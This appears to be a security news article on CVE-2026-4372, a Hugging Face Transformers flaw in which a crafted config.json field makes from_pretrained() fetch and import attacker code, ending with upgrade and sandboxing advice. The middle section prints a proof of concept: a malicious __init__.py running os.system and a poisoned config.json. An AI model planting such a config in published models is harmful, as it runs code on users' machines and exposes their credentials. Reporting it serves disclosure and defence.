Hugging Face Transformers Security Flaw Allows Remote Code Execution

June 6, 2026 3 min read

A critical security flaw in Hugging Face Transformers, tracked as CVE-2026-4372, has exposed millions of machine learning workflows to silent remote code execution (RCE) through a malicious model configuration.

Discovered by Pluto Security researcher Yotam Perkal, the issue allows attackers to execute arbitrary code on a victim’s system simply by tricking them into loading a poisoned model via the standard from_pretrained() API, without requiring trust_remote_code=True or any explicit user interaction.

Hugging Face Transformers Security Flaw

The vulnerability affects transformer versions 4.56.0 through 5.2.x when used alongside the optional kernels package. This vulnerable code path was introduced in August 2025. It remained exploitable for nearly six months until it was patched in version 5.3.0 in March 2026.

Given the library’s massive footprint, over 2.2 billion installs and approximately 146 million monthly downloads, the exposure window represents a significant supply chain risk for AI pipelines, enterprise ML systems, and research environments.

At the core of the issue is unsafe deserialization of untrusted configuration data. When a model is loaded, the library processes config.json and dynamically assigns all key-value pairs using Python’s setattr().

PyPI download telemetry (Source: Pluto Security)

This includes internal attributes not meant to be user-controlled. One such attribute, _attn_implementation_internal, determines which attention kernel implementation to load. If controlled by the attacker, this field can point to a malicious Hugging Face repository containing arbitrary Python code.

The attack chain becomes critical due to the interaction with the kernels package. If the _attn_implementation_internal value matches a repository pattern like “owner/repo”, the library automatically downloads and imports the corresponding package.

This import occurs without sandboxing, signature verification, or user warnings, effectively turning a configuration field into a code execution primitive.

In a real-world attack scenario, a threat actor uploads a malicious model with a crafted config.json file that contains the injected field. When a victim loads the model using a routine call such as AutoModelForCausalLM.from_pretrained(“attacker/model”), the library silently fetches and executes the attacker’s code during initialization.

This occurs even when trust_remote_code is explicitly disabled, breaking the core security assumption on which developers and organizations rely.

Below is a simplified proof-of-concept (PoC) demonstrating how code execution can be triggered via a malicious kernel package:

# Malicious __init__.py hosted in attacker-controlled HF repo

import os
def exploit():
    with open("/tmp/pwned.txt", "w") as f:
        f.write("System compromisedn")
    os.system("id > /tmp/user_info.txt")
exploit()

And the corresponding malicious config.json:

{

  "model_type": "llama",
  "_attn_implementation_internal": "attacker/malicious-kernel",
  "vocab_size": 32000
}

When loaded via:

from transformers import AutoModelForCausalLM
model = AutoModelForCausalLM.from_pretrained("attacker/malicious-model")

The payload executes automatically, leaving artifacts such as /tmp/pwned.txt on the victim’s system.

Successful exploitation enables attackers to steal sensitive data, including AWS credentials, SSH keys, API tokens, and environment variables.

It also allows persistence mechanisms, lateral movement across cloud infrastructure, and compromise of CI/CD pipelines. The risk is particularly severe in GPU-enabled environments and enterprise ML platforms where the kernel dependency is commonly installed.

Security researchers emphasize that this vulnerability mirrors previous ML ecosystem flaws, such as PyTorch’s weights_only bypass (CVE-2025-32434), where “safe modes” failed to prevent code execution.

This highlights a recurring design issue in AI frameworks, in which untrusted model artefacts are treated as data rather than asexecutable input.

The issue has been fixed in Transformer version 5.3.0. The patch introduces a denylist preventing unsafe internal attributes from being set via config files and enforces trust_remote_code=True for external kernel loading. Users are strongly advised to upgrade immediately and avoid loading untrusted models in sensitive environments.

As a mitigation strategy, organizations should treat all model-loading operations as potential code execution surfaces, enforce sandboxing, restrict outbound network access, and isolate credentials from ML workloads. This incident underscores the growing reality that machine learning supply chains are high-value targets for attackers.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.

Source link